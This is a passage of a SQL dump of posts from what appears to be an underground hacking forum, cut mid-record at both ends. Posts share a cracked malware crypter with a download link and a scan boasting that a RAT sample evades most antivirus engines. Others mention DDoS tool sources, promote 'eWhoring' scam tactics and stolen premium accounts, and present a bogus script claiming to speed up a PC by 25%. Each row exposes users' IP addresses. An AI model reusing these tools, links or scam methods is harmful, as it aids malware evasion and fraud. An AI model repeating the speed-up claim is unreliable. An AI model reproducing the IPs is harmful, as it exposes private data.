[color=#FF0000]PROOF: THIS METHOD IS CONFIRMED WORKING BY ME, I JUST CALLED A NUMBER AND TEXTED A NUMBER. [quote=Offence RAT] damn it worked. [img]http://puu.sh/1jwlN[/img] [/quote] [/color]', '72.231.24.165', '1223104677', '0', '0', '7', '1351390839', '1', 'e75a82608a3cf751f41564c77428c7e0', '0', '1351390839'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6524', '1121', '0', '20', 'JodMod Crypter 1/35 cracked', '0', '7', 'Romdu62', '1351390969', 'HF thread - http://www.hackforums.net/showthread.php?tid=2965136 Archivo: cybergate.exe Tama?o: 369240 Bytes MD5: 9c8f8586253e7886672a3d0ca268a73c SHA1: 03bdf64a3f49425986d38334be1b2946a88e40b3 Resultado: 1/35 Estado: Infectado AVG Free - OK ArcaVir - OK Avast 5 - OK AntiVir (Avira) - OK BitDefender - OK VirusBuster Internet Security - OK Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - OK eTrust-Vet - OK F-PROT Antivirus - OK F-Secure Internet Security - OK G Data - OK IKARUS Security - OK Kaspersky Antivirus - OK McAfee - OK MS Security Essentials - OK ESET NOD32 - OK Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - OK Quick Heal Antivirus - OK Rising Antivirus - OK Solo Antivirus - OK Sophos - OK Trend Micro Internet Security - OK VBA32 Antivirus - OK Vexira Antivirus - Suspicious!SA Zoner AntiVirus - OK Ad-Aware - OK BullGuard - OK Immunet Antivirus - OK K7 Ultimate - OK VIPRE - OK Download: http://www.speedyshare.com/ZE5k8/JOD-Cryp.rar', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'ae4850481f6ed3cf4b0b97ad0570dd51', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6525', '1105', '6427', '24', 'RE: Windows 8 Officially released 26-10', '0', '7', 'Romdu62', '1351391031', 'I will not swith now i will in january when they fix all bugs.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'ee4153a1cc7aba3dfc00e12cbe9b649f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6526', '1122', '0', '25', '[TuT]How To Speed Up Your Computer', '0', '7', 'Romdu62', '1351391118', '[color=#0000CD][size=medium][font=Times New Roman][i][b][align=center][TuT]How To Speed Up Your Computer[/align][/b][/i][/font][/size][/color] Well now you don\'t have to download any software or any other application to make your computer any faster , you are going to create your own application or its fine to say a script which will Speed up your computer by [b]25%[/b] and yes, you can feel the result instantly on you pc. So just follow out this easy steps. [color=#FF0000][b]First open you notepad and just copy/paste the code below on your notepad:[/b][/color] [code]mystring=(80000000) for 128 MB? RAM mystring=(160000000) for 256 MB? RAM mystring=(320000000) for 512 MB? RAM mystring=(655000000) for 1GB RAM mystring=(1000000000) for 2GB RAM & Above.[/code] Only choose 1 line. [b]For example:[/b] If I have 2Gb+ [b]I put in Notepad:[/b] [code]mystring=(1000000000)[/code] Now save this notepad and type in this as the name \" [b]ram.vbe[/b] \" ( without quote.) Now click on \" [b]ram.vbe[/b] \" and you are done, you can realize the Boost Instantly. This trick is personally checked by me and found [b]25%[/b] Increase In my PC Speed. If you don\'t believe me than just use any Pc performance checker and test it. [b]NOTE:[/b] [color=#0000CD][b]You have to do this only once![/b][/color] [color=#696969][b]You won\'t see anything pop up so you may think it didn\'t run, but it did.[/b][/color] [b]Credits:[/b] [size=x-small]Deltaforce[/size] Enjoy!;)', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'dd94feafa03ee5ac902b090678da98d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6527', '1123', '0', '44', 'eWhoring Tactics; How to Change Writing on Pics', '0', '5', 'Timmy', '1351391351', '[align=center][img]http://i.imgur.com/TtoJU.png[/img][/align]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7cd70bbbef33eaabd7479a0ae6a6abd5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6528', '834', '4377', '64', 'RE: The Marine DVDrip', '0', '9', 'p420', '1351391417', 'Thanks going to watch this now and might update my rating on the movie.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'ed7b8dfd8fda141cca507ea841b3f24e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6529', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '8', 'spacefish36', '1351392280', '10/10 because he is the celebrity of LH', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '4933efe78216fd60aa374c590a706aa8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6530', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '82', 'iTzIpod', '1351394655', 'Legit. Actually works! :) Thanks for the method. VOUCH. :) It\'s not really a Skype premium though.. It only allows you to call a group with a certain amount of people or whatever. [img]http://i.imgur.com/nsolw.png[/img]', '24.212.197.164', '416597412', '1', '0', '82', '1351395661', '1', '8ffbf7cab8cc09396032b74220d3262e', '0', '1351395661'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6531', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351394709', 'Lol thanks Spacefish. But no I\'m not the celebrity of LH. 10/10. Sexiest avatar known to mankind. You got no avatar at all <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5adf433020f2d909d8ec2372a2b6f43b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6532', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '53', 'sirchamp', '1351415127', 'Delivered 3k Vouch views to itzipod. You have now 9.3 Dollars on your account. Proof [img]http://i.imgur.com/RTbOv.jpg[/img]', '9.206.60.253', '164510973', '1', '0', '53', '1351415143', '1', '848b530b4b9b95d91fe6a264265f7140', '0', '1351415143'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6533', '1099', '6401', '16', 'RE: Box Method and Drop Explained', '0', '150', 'MinecraftGeek', '1351421350', 'I guess this could work but it\'s risky.', '86.161.32.155', '1453400219', '0', '0', '0', '0', '1', '2f74831e2f0adb0a2c6f15187f066cf4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6534', '1123', '6527', '44', 'RE: eWhoring Tactics; How to Change Writing on Pics', '0', '228', 'VirtualLegend', '1351422260', 'Nice Thread, This will help alot', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ada0c29a4b39f3c73e02ce510ba1c4b1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6535', '1115', '6479', '49', 'RE: Update the logo....', '0', '205', 'mothered', '1351425669', 'Although It doesn\'t match the theme, I must say that I like It. It breaks up the green, and looks quite appealing.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a1c75f647351819755cce2e5a236cd48', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6536', '1123', '6527', '44', 'RE: eWhoring Tactics; How to Change Writing on Pics', '0', '62', 'R?????zo?', '1351430954', 'Looks good, even though I already knew how to do this before :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1f961f601a6e106b213f96ccfaabfa46', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6537', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '100', '??zg???g????61', '1351434688', 'Nope, a friend gave me the sources for hDos and bDos. I don\'t use a paid booter xD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '48bcdec5c85c246f789f6ef93f7799aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6538', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1351435065', 'VOUCH. :) [img]http://i.imgur.com/y7OK1.png[/img] Thanks sirchamp. Will you ever consider releasing the program to the public or whatever you\'re using?', '24.212.197.164', '416597412', '1', '0', '82', '1351435452', '1', '5a14f25459ade0edcf5d7d9e0b0ebea9', '0', '1351435452'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6539', '1115', '6535', '49', 'RE: Update the logo....', '0', '61', 'NXK', '1351435569', '[quote=\'mothered\' pid=\'6535\' dateline=\'1351425669\'] Although It doesn\'t match the theme, I must say that I like It. It breaks up the green, and looks quite appealing. [/quote] It does look very good. I must say good job expose for this :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'a07895991460eca466c4ff6c4e864647', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6540', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '62', 'R?????zo?', '1351439475', '10/10 because I loved pokemon :P', '94.132.244.168', '1585771688', '1', '0', '62', '1351439782', '1', '5ea78a34f5b473b34632043830b88783', '0', '1351439782'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6541', '1124', '0', '42', '22-Year-Old Girl Sells Her Virginity Online', '0', '264', 'D?ea', '1351440150', '[IMG]http://www.foxnews.com/images/492948/0_61_011509_nataliedylan.jpg[/IMG] A 22-year-old woman is selling her virginity online — offering her body to bidders nationwide in an auction that reportedly has netted a $3.7 million offer — and the law isn\'t doing a thing to stop her. The FBI isn\'t interested. The U.S. attorney doesn\'t care. Everything is fine by local police, and she isn\'t breaking any laws. That\'s because Natalie Dylan, a made-up name for a real 22-year-old California college grad, is marketing her maidenhead in Nevada, where prostitution is legal. But some religious legal groups are objecting to the sexual sale, saying they are concerned that its influence may reach beyond the borders of the \"Battle Born\" bordello state. \"It does seem crazy,\" said Mathew Staver, director of the Liberty Center for Law and Policy. \"The rest of the country has an interest in stopping that kind of activity from spreading from Nevada to their home state.\" Staver said because the bidding was being conducted online, federal law could be applied to stop the auction from going through. \"Nevada has been out of step with the rest of the country for many years with regards to prostitution, and that\'s why I think it\'s important for federal prosecutors to look into this, so that Nevada does not dictate the morals and moral decency for the rest of the nation,\" Staver told FOXNews.com. But federal authorities said there wasn\'t much they could do about the case, and deflected attention toward local statutes. \"Being that prostitution is legal in the area that she\'s listing from, and she\'s over 18 and it\'s consensual, I would defer it to local police authorities,\" said David Staretz, a spokesman for the FBI\'s Las Vegas field office. The Postal Inspection Service, which monitors the Internet for some illegal transactions, is \"currently unaware of any specific fed prohibition against this activity,\" said spokesman Al Weissman. The office of the U.S. attorney in Nevada said that it has prosecuted over 200 cases in the last six years involving the solicitation of minors online, but it had never worked on a case like this involving adults. The Moonlite Bunny Ranch, the brothel that is arranging and hosting the deal, sounded especially gung-ho about Dylan. \"Natalie is a virgin and would like to sell this priceless and rare commodity in a very exclusive and private setting,\" says the Bunny Ranch Web site. While the commodity\'s rarity may be debatable, more than 10,000 bidders have come forth to put a price tag on Dylan\'s purity. And if the Bunny Ranch\'s owner is to be believed, someone has offered $3.7 million, a price far above rubies. \"One time only she will appear at the bunny ranch and give up her virginity to the highest bidder,\" says the brothel\'s Web site in a needlessly repetitive statement. Dylan says she is trying to finance graduate studies for her sister and herself. Some legal experts say they\'re well within their rights to make the sale. \"It\'s a First Amendment issue. You can advertise goods or services that are illegal where they\'re advertised but legal where they\'re performed,\" said Marc Randazza, an attorney specializing in first amendment law. \"What\'s she\'s advertising is as legal as toast with the crust cut off where she is.\" Randazza said some prosecutors might be eager to jump on the case, but that this \"commercial speech\" is protected. \"If this is legal where it\'s being advertised\" — in Nevada — \"the government can\'t say you can\'t advertise it here,\" he told FOXNews.com. (Source): http://www.foxnews.com/story/0,2933,480037,00.html', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'f4176307a8b335fef802fc2836183f15', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6542', '1125', '0', '42', 'Death by Monster energy drink', '0', '264', 'D?ea', '1351440285', 'Reuters) - The Food and Drug Administration said on Monday that it was investigating reports of five deaths that may be associated with Monster Beverage Corp\'s namesake energy drink, and the company\'s shares fell more than 14 percent. Monster is also being sued by the family of a 14-year-old Maryland girl with a heart condition who died after drinking two cans of its Monster energy drink in a 24-hour period. Monster said it does not believe its drinks are \"in any way responsible\" for the girl\'s death. The energy drink market is dominated by Monster and Austrian company Red Bull, but it also includes beverages made by Coca-Cola Co and PepsiCo. The lawsuit and reports of other deaths that may be associated with energy drinks illustrate safety concerns surrounding the highly caffeinated beverages that are especially popular with young people. They could also embolden the industry\'s critics, including two senators and the New York attorney general. \"I don\'t think they are going to ban energy drinks,\" said Morningstar analyst Thomas Mullarkey. \"The question arises whether or not it gives them more firepower for increased regulation.\" That could mean more extensive labeling requirements or age restrictions, Mullarkey said. He added that the negative headlines also made Monster a less attractive takeover target. \"This really reduces the likelihood that Coke would want to acquire Monster,\" Mullarkey said. Sources told Reuters in April that the two companies had discussed a possible deal as recently as last year. CONCERNS NOT NEW The family of Anais Fournier sued Monster on Friday for failing to warn about the product\'s dangers. The lawsuit, filed in California Superior Court in Riverside, said that after drinking two 24-ounce cans of Monster Energy on consecutive days Fournier went into cardiac arrest. She was placed in an induced coma and died six days later on December 23, 2011. The lawsuit said Fournier died from \"cardiac arrhythmia due to caffeine toxicity\" that complicated an existing heart valve condition related to a disorder called Ehlers-Danlos syndrome. The two drinks together contained 480 milligrams of caffeine, the equivalent of 14 12-ounce cans of Coca-Cola, according to the lawsuit. \"Monster is unaware of any fatality anywhere that has been caused by its drinks,\" the company said in a statement, adding that it intended to vigorously defend itself against the lawsuit. On Monday, FDA spokeswoman Shelly Burgess said the agency had received reports of five deaths and one heart attack that may be associated with the Monster energy drink from 2009 through June this year. The FDA said it investigates any report of injury or death that it receives. The notices to the FDA\'s adverse events database do not in themselves confirm a risk from a product. Burgess said manufacturers are required to submit all reports on serious adverse events to the FDA within 15 days of receiving them, and that they are responsible for providing follow-up information that could shed light on their cause. Last month, Senators Dick Durbin of Illinois and Richard Blumenthal of Connecticut sent a letter to the FDA asking it to investigate the interaction of ingredients in energy drinks and the effect of the caffeine on children and adolescents. The letter followed a similar request from Durbin in April. In July, New York Attorney General Eric Schneiderman issued subpoenas to three energy drink makers -- Monster, PepsiCo and Living Essentials LLC -- seeking information on the companies\' marketing and advertising practices. PepsiCo makes the AMP energy drink, and Living Essentials makes 5-Hour Energy. The combination of caffeine and alcohol came into the spotlight two years ago when a handful of college students were hospitalized for alcohol poisoning after drinking alcoholic energy drinks like Four Loko. Four Loko\'s maker later removed the caffeine from the drinks. Monster is the leading U.S. energy drink by volume with nearly 39 percent of the U.S. market, but Austria\'s Red Bull has the highest share by revenue due to its premium price. Monster Energy drinks are sold in the United States and Europe, and the company is rolling them out to Ecuador, Hong Kong, Japan, Macau and Slovenia. It said in August that it was planning more international launches next year. The company had net sales of $592.6 million in the second quarter, ended on June 30. Monster shares closed down 14.23 percent at $45.73 on the Nasdaq. The case is Crossland et al v. Monster Beverage Corp, California Superior Court, Riverside County, No. RIC1215551. Link: http://www.reuters.com/article/2012/10/2...6G20121022', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '35cabea733fe99bf8dab24d72d88dd5c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6543', '1126', '0', '42', 'Facebook spent $715M on Instagram, $87M on other acquisitions this year', '0', '264', 'D?ea', '1351440704', 'Facebook spent $87 million so far this year on business acquisitions not including its Instagram purchase, the company revealed in a filing with the Securities and Exchange Commission today. Facebook spent $521 million on Instagram — $300 million of which was in cash, the rest in vested shares of Class B common stock. Facebook additionally issued 11 million unvested shares to employee stockholders of Instagram, with a value of about $194 million to be recognized as they vest over three years. This makes the total price of the mobile photo sharing app $715 million, shy of the $1 billion original price, which decreased with Facebook’s stock value. [img]http://www.insidefacebook.com/wp-content/uploads/2012/10/facebook_logo1.png[/img] Facebook reported $87 million in other business acquisitions from Jan. 1 to Sept. 30. Apart from Instagram, this year Facebook has bought Tagtile, Glancee, Karma, Face.com and Threadsy. Tagtile was a mobile-based customer loyalty management startup that offered payments hardware and software for merchants. Glancee was an ambient mobile location app that alerts users when people with similar interests are nearby. Karma was a mobile gifting and commerce service, which was turned into Facebook Gifts. Face.com was a facial recognition technology company. Threadsy offered a Klout-like service called Swaylo to connect brands and influencers, and help users understand their own influence on Facebook. Facebook also made a number of acqu-hires this year, picking up employees from Momentus Media, Lightbox, Bolt Peters, Pieceable Software, Spool, Acrylic and Carsabi. The company only spent $24 million on acquisitions at the end of Q2, indicating that the most recent acquisitions to close added up to $63 million. Facebook did not include details about the price of each deal or when they closed.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'ca9185a0abe9357781f3cd72f475a2f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6544', '1127', '0', '42', 'Up to 100 Hackers to be offered a Job at MI5 or MI6', '0', '264', 'D?ea', '1351440836', 'Source: http://www.bbc.co.uk/news/uk-politics-19993921 [code] Up to 100 members of \"generation Xbox\" will be offered a career in the secret services, under a scheme announced by Foreign Secretary William Hague. The recruitment drive was aimed at \"the young innovators of this generation who will help keep our country safe in years to come\", Mr Hague said. The 18-year-olds will be trained in advanced IT skills and then expected to work on tackling cybercrime. Their task was \"every bit as serious\" as conventional warfare, Mr Hague said. Speaking at Bletchley Park, the home of Britain\'s Second World War codebreakers, the foreign secretary said: \"Today we are not at war, but I see evidence every day of deliberate, organised attacks against intellectual property and government networks in the United Kingdom from cyber criminals or foreign actors with the potential to undermine our security and economic competitiveness. \"This is one of the great challenges of our time, and we must confront it to ensure that Britain remains a world leader in cyber security and a pre-eminent safe space for e-commerce and intellectual property online.\" \'Slightly naughty\' Successful applicants to the Single Intelligence Account apprenticeship will pursue a foundation degree course in communications, security and engineering over two years at De Montfort University in Leicester. They will also study for a level 4 diploma in IT, software, web and telecommunications professional competence, and will be expected to work predominantly at GCHQ, the electronic communications agency - although some will go on to work for MI5, the security service, or MI6 intelligence agency. Mr Hague also used his visit to announce a boost in funding for the preservation of Bletchley Park, the forerunner to GCHQ. The cyber security minister in the previous Labour government, Lord West, said in 2009 that the government had recruited a team of former hackers for its new Cyber Security Operations Centre, based at GCHQ in Cheltenham. They had not employed any \"ultra, ultra criminals\" but needed the expertise of former \"naughty boys\", he told BBC Radio 4\'s PM programme. \"You need youngsters who are deep into this stuff... If they have been slightly naughty boys, very often they really enjoy stopping other naughty boys,\" he said. [/code] [i]What do you guys think?[/i]', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'e7cc7f63c93af6213c00b183c1506280', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6545', '1113', '6476', '54', 'RE: [27 0ct]huge collection of premium porn acounts. all checked and working', '0', '1', 't3h jok3r', '1351444965', 'Thanks, how do you get so many accounts so easily?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3758fcbbd32b394cbeedcc3862fa1b66', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6547', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1351456887', '2 Payouts from members of LH right? Hopefully.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '66376bff7180127ca15a28b60a66ba09', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6548', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351456919', '10/10 because I love Anime. ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd57d4363bf348bde8d73e218d18ff7cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6549', '1124', '6541', '42', 'RE: 22-Year-Old Girl Sells Her Virginity Online', '0', '82', 'iTzIpod', '1351457019', 'I remember that there once was a man selling his virginity online and the bid was like $7,000,000+ He was a body builder. I may be wrong. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ba330ecc1f32175b04571ada33e7fb77', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6550', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '82', 'iTzIpod', '1351457095', 'I heard about this tragic event on Tuesday. It could\'ve been because the girl had very bad health. Either or on the Monster drink, it says that you should not consume x amount in x duration. So they should not get sued. If I\'m not mistaken of course.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2c60fe54ffb60914840c3860ad82734e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6551', '1115', '6479', '49', 'RE: Update the logo....', '0', '82', 'iTzIpod', '1351457152', 'Should this thread be closed now? :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bd2ac8276848e09fde0fd0dff188ac16', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6552', '1115', '6479', '49', 'RE: Update the logo....', '0', '222', 'Exposé', '1351459722', 'Jok3r just switch it with this...moved it up a bit.. [IMG]http://i.imgur.com/6Q9M7.png[/IMG]', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'e3d6e8473101b2460dc74291d2f75919', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6553', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '222', 'Exposé', '1351459832', '8/10 because I used to like pokemon and its original :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '94734247a286e6c0efa6c47ebbc79582', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6554', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '5', 'Timmy', '1351462577', '10/10 because he made the halloween logo.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8c272f6f73e53f1a3a9b2dfdc34fa6bf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6555', '1115', '6479', '49', 'RE: Update the logo....', '0', '5', 'Timmy', '1351462624', 'Thread should be closed now.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '92c043f82a9c5018550a281932775252', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6556', '1127', '6544', '42', 'RE: Up to 100 Hackers to be offered a Job at MI5 or MI6', '0', '5', 'Timmy', '1351462832', 'That\'s great but they might fuck some over.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '40f70f8c1a94636ef2d1841039815d2b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6557', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '5', 'Timmy', '1351462885', 'Damn that sucks. They 